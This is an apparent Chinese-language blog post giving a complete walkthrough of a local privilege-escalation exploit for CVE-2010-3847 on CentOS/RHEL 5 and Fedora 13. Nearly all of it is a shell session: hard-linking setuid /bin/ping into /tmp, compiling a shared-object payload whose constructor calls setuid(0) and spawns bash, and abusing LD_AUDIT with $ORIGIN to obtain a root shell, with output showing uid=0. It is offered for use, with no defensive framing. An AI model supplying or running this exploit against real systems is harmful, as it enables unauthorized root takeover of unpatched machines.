CVE-2010-3847 提权
CentOS5/RHEL5/Fedora13 貌似都可以XXXOO

直接上过程
[yinyin@CentOS ~]$ mkdir /tmp/exploit
[yinyin@CentOS ~]$ ln /bin/ping /tmp/exploit/target
[yinyin@CentOS ~]$ exec 3< /tmp/exploit/target
[yinyin@CentOS ~]$ ls -l /proc/$$/fd/3 lr-x—— 1 leif leif 64 Oct 20 10:00 /proc/31911/fd/3 -> /tmp/exploit/target
[yinyin@CentOS ~]$ rm -rf /tmp/exploit/
[yinyin@CentOS ~]$ ls -l /proc/$$/fd/3
lr-x—— 1 leif leif 64 Oct 20 10:00 /proc/31911/fd/3 -> /tmp/exploit/target ( deleted)

[yinyin@CentOS ~]$ vi payload.c
按a写入
void __attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
x或者wq命令保存
[yinyin@CentOS ~]$ ls
payload.c
[yinyin@CentOS ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[yinyin@CentOS ~]$ ls -l /tmp/exploit
-rwxrwxr-x 1 leif leif 4223 Oct 20 10:01 /tmp/exploit
[yinyin@CentOS ~]$ LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
[root@CentOS ~]# whoami
root
[root@CentOS ~]# id
uid=0(root) gid=503(xxoo) groups=503(xxoo)
[root@CentOS ~]# lsb_release -a
LSB Version: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID: CentOS
Description: CentOS release 5.4 (Final)
Release: 5.4
Codename: Final
[root@CentOS ~]# uname -a
Linux CentOS1 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux